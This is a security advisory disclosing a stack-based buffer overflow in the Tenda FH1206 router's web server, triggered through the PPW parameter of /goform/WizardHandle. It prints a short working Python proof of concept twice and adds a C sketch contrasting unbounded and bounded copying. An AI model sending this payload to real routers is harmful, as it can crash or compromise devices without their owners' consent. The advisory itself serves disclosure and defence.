Tenda FH1206 V1.2.0.8(8155)_EN
The Tenda FH1206 V1.2.0.8(8155)_EN has a stack overflow vulnerability located in the `fromWizardHandle` function. This function accepts the `WANT` and `WANS` parameters from a POST request. Within `case 2`, this function accepts the `PPW` parameter from a POST request, which is passed to `decodePwd(v22, v54);`. However, since the user has control over the input of `PPW`, the function `decodePwd()` leads to a buffer overflow: the user-supplied `PPW` can exceed the capacity of the `v54` array, thus triggering this security vulnerability.
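The defect class described above, as an added illustration that is not Tenda's code: the page says only that `decodePwd()` writes a user-controlled `PPW` value into the fixed stack array `v54` with no length check, so the sketch below models that pattern as a plain copy into a fixed buffer and places a bounded version beside it that rejects an oversized value before touching the stack. The function names `decode_pwd_unbounded`, `decode_pwd_bounded`, `handle_wizard_ppw` and `probe_ppw`, the buffer size `PWD_BUF`, and the status codes are all hypothetical; the real size of `v54` and the real internals of `decodePwd()` are not stated on the page.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical capacity of the fixed stack array the advisory calls v54.
 * The real size is not stated on the page; 64 is a constructed value. */
#define PWD_BUF 64

/* The pattern the advisory describes: the request parameter is copied into
 * a fixed-size stack array without checking its length, so a PPW value of
 * PWD_BUF bytes or more overruns the array. Shown for contrast only; it is
 * never called below. */
void decode_pwd_unbounded(const char *ppw)
{
    char buf[PWD_BUF];
    strcpy(buf, ppw);            /* unbounded copy: the overflow */
    (void)buf;
}

/* Hardened form: measure the value against the destination first, refuse
 * anything that cannot fit together with its terminator, then copy with an
 * explicit bound. Returns 0 on success, -1 if the value was rejected. */
static int decode_pwd_bounded(const char *ppw, char *out, size_t out_len)
{
    size_t n = 0;
    while (n < out_len && ppw[n] != '\0')   /* bounded length scan */
        n++;
    if (n >= out_len)                       /* no room for the terminator */
        return -1;
    memcpy(out, ppw, n);
    out[n] = '\0';
    return 0;
}

/* Handler-style wrapper returning an HTTP-like status: 400 when PPW is
 * missing or too long for the stack buffer, 200 when it fits. Only the
 * shape of the WANT=2 branch is mirrored; the real handler logic is not
 * on the page. */
int handle_wizard_ppw(const char *ppw)
{
    char pwd[PWD_BUF];
    if (ppw == NULL || decode_pwd_bounded(ppw, pwd, sizeof pwd) != 0)
        return 400;
    /* the decoded password would be used here */
    return 200;
}

/* Exercises the handler with a constructed PPW value of n repeated 'a'
 * characters, the same shape of input the advisory's PoC sends. */
int probe_ppw(size_t n)
{
    char val[2048];
    if (n >= sizeof val)
        return -1;
    memset(val, 'a', n);
    val[n] = '\0';
    return handle_wizard_ppw(val);
}

int main(void)
{
    printf("7 x 'a'   -> %d\n", probe_ppw(7));    /* fits: 200 */
    printf("63 x 'a'  -> %d\n", probe_ppw(63));   /* largest that fits: 200 */
    printf("64 x 'a'  -> %d\n", probe_ppw(64));   /* rejected: 400 */
    printf("999 x 'a' -> %d\n", probe_ppw(999));  /* PoC-sized, rejected: 400 */
    return 0;
}
```

The important design point is that the length check happens before any write into the stack array, and that the limit is derived from `sizeof` the destination rather than repeated as a separate constant, so the two cannot drift apart.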
Proof of concept for `fromWizardHandle`:

```python
# fromWizardHandle
import requests

# target address of the router's web interface
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/WizardHandle"
# WANT=2 selects the branch that reads PPW; the oversized PPW value triggers the overflow
data = {"WANS": "-1", "WANT": "2", "PPW": 'a' * 999}
ret = requests.post(url, data=data)
```
### Product version
Tenda FH1206 V1.2.0.8(8155)_EN
### Affected component
the `fromWizardHandle` function of /bin/httpd
### Attack vector
A simple exploit, like this:

```python
# python3
import requests

# target address of the router's web interface
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/WizardHandle"
# WANT=2 selects the branch that reads PPW; the oversized PPW value triggers the overflow
data = {"WANS": "-1", "WANT": "2", "PPW": 'a' * 999}
ret = requests.post(url, data=data)
```
### Description
Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the PPW parameter at ip/goform/WizardHandle.
### Reference
<https://palm-vertebra-fe9.notion.site/fromWizardHandle-98e188c072984620a907ea5df0d80ad5>
<https://www.tendacn.com/hk/download/detail-2344.html>